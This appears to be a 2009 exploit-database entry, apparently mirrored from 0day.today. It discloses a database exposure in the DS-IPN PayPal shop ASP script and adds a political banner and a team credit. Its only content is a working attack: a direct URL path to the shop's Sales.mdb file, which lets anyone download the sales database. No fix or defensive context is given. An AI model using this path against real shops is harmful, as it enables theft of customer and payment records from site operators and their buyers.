id: 4698
date: 01/18/2009
title: DS-IPN.NET Digital Sales IPN Database Disclosure Vulnerability
author: Moudi
cves: 

==============================================================
DS-IPN.NET Digital Sales IPN Database Disclosure Vulnerability
==============================================================


==============================================================================
        [»] We love Palestine, stop the war, too many innocent people!!
==============================================================================
    DS-IPN Paypal Shop Remote Database Disclosure Vulnerability
==============================================================================

	[»] Script:             [ DS-IPN Paypal Shop  ]
	[»] Language:           [ ASP ]
	[»] Website:            [ http://shop.robs-projects.com/product_DS-IPN.html ]
        [»] Team:               [ EvilWay ]

###########################################################################

===[ Exploit ]===	
	
	[»] http://localhost/[path]/Database/Sales.mdb


Author: Moudi

###########################################################################



#  0day.today [2023-03-24]  #